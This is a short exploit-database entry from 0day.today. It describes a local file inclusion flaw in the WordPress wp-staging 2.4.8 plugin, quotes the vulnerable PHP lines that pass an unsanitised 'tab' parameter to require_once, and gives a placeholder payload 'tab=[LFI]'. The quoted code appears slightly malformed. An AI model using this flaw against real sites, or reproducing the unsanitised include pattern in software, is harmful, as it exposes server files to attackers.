[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress wp-staging 2.4.8 Plugin - Local File Inclusion Vulnerability

Author
41!kh4224rDz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31933
Category
web applications
Date add
12-01-2019
Platform
php
Exploit Title:  WordPress Plugin wp-staging 2.4.8 - Local File Inclusion
# Date: 12/01/2019
# Exploit Author:41!kh4224rDz
# Vendor Homepage: https://wp-staging.com/
# Software Link: https://wordpress.org/plugins/wp-staging/
# Category: webapps
# Version:2.4.8
# Tested on: WiN7_x64/

#Local File Inclusion
# File: /index.php
# Vulnerable code: $activeTab = $_GET['tab'] : "import_export";
30:require_once $this->path . "views/tools/tabs/" . $activeTab . ".php"; 
5: $activeTab = $_GET['tab'] : "import_export"; 

# Example payload:
tab=[LFI]

#  0day.today [2024-11-15]  #